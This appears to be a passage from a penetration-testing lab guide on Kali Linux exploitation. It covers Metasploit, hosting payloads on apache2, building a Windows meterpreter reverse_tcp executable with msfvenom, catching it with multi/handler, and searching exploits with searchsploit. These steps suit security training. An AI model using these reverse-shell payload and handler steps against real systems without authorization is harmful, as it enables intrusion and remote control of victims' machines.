Exploitation
The Metasploit Framework
Simply put, the Metasploit Framework is a system containing development tools for exploit development and usage. Within the framework is a database that allows you to save information associated with scanning, enumeration, and exploitation. This database allows you to create databases to keep your engagement information separate. This workspace can be exported and imported if sharing with team members is required. An additional option is Metasploit Community or Metasploit Pro which allows for the workspace information to be displayed via the web.
Web Server (apache2)
There will be times where you will need a webserver to serve files to a victim. One such way to do this in Kali is to start your apache2 service and create a separate directory just for payloads. Once the directory is created you can either create payloads with msfvenom and move them from that directory or run the msfvenom commands from the payloads directory.
# service apache2 start
# cd /var/www/html
# mkdir payloads
# cd payloads
Msfvenom
Msfvenom is a tool that allows for the creation of custom shellcode. For this lab, you can run this command from the newly created payloads directory. You should research different ways to use msfvenom to create custom exploits with custom payloads. A few useful commands are:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[your ip] LPORT=[preferred port] -f exe > anyname.exe
Multi-handler
Using this tool in conjunction with a multi-handler can allow you to exploit a Windows machine and gain the coveted meterpreter.
# msfconsole
msf> use exploit/multi/handler
multi-handler> set payload windows/meterpreter/reverse_tcp
multi-handler> set lhost [your ip]
multi-handler> set lport [your preferred port]
multi-handler> exploit -j
- Press “Return” once complete and type “Sessions” Finding Exploits
Once an analyst has completed the Scanning and Enumeration phase of a pentest they must use the results to find vulnerabilities on the target system. Once the vulnerabilities have been found, their associated exploit(s) can be used to the target system.
Search
You can simply search for whatever you are looking for or you can be very specific.
Searchsploit
Searchsploit is a command-line-based tool that allows you to search for various exploits. The exploits are stored in a local database within Kali. This means that you do not need internet access to find them.
msf > searchsploit proftpd
msf > searchsploit -w proftpd
To open searchsploit, click on Applications> Exploitation Tools> searchsploit